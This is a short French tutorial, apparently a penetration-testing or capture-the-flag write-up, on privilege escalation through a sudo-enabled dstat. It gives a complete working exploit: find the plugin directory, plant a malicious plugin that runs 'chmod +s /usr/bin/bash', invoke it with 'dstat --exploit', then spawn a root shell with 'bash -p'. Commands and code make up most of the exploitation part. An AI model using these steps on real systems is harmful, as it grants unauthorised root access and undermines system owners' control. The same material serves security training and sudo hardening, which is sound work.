Sudo Dstat Privilege Escalation

Contexte

La commande Sudo dstat peut être vulnérable à l’élévation de privilèges (PrivEsc).

dstat est un outil polyvalent pour générer des statistiques sur les ressources système. Il permet aux utilisateurs de créer un plugin personnalisé et de l’exécuter en ajoutant une option, par ex. dstat –monplugin.

Enquête

La condition pour pouvoir utiliser cette exploit est de pouvoir, exécuter la commande dstat en tant que root, ce qui va nous permettre d’accéder aux privilèges root en utilisant notre plugin malveillant.

Exploitation

Créer un nouveau plugin Dstat

Tout d’abord, recherchez le répertoire dstat.

find / -type d -name dstat 2>/dev/null

Supposons que l’emplacement de dstat est : /usr/local/share/dstat.

Créez un fichier appelé dstat_exploit.py sous /usr/local/share/dstat/.

Dans le fichier dstat_exploit.py, saisissez la payload suivante :

import os

os.system('chmod +s /usr/bin/bash')

maintenant nous avons un plugin exploit car dans ce répertoire la nomenclature d’un plugin est la suivante : dstat_<plugin-name>.py

Pour Vérifier que le plug-in d’exploitation ci-dessus a été ajouté en exécutant la commande suivante:

dstat --list | grep exploit

(le grep c’est uniquement pour faire un flitre sur notre plugin qui est bine exploit)

Exécuter Dstat avec le plugin malveillant

Exécutez maintenant "dstat" avec l’indicateur "-exploit" (le nom de l’indicateur comme dit précédemment est déterminé par le suffixe du nom de fichier, en suivant la nomenclature dstat_<plugin-name>.py).

/usr/bin/dstat --exploit

Le plugin d’exploit s’est exécuté donc nous entrons bash en tant que root.

bash -p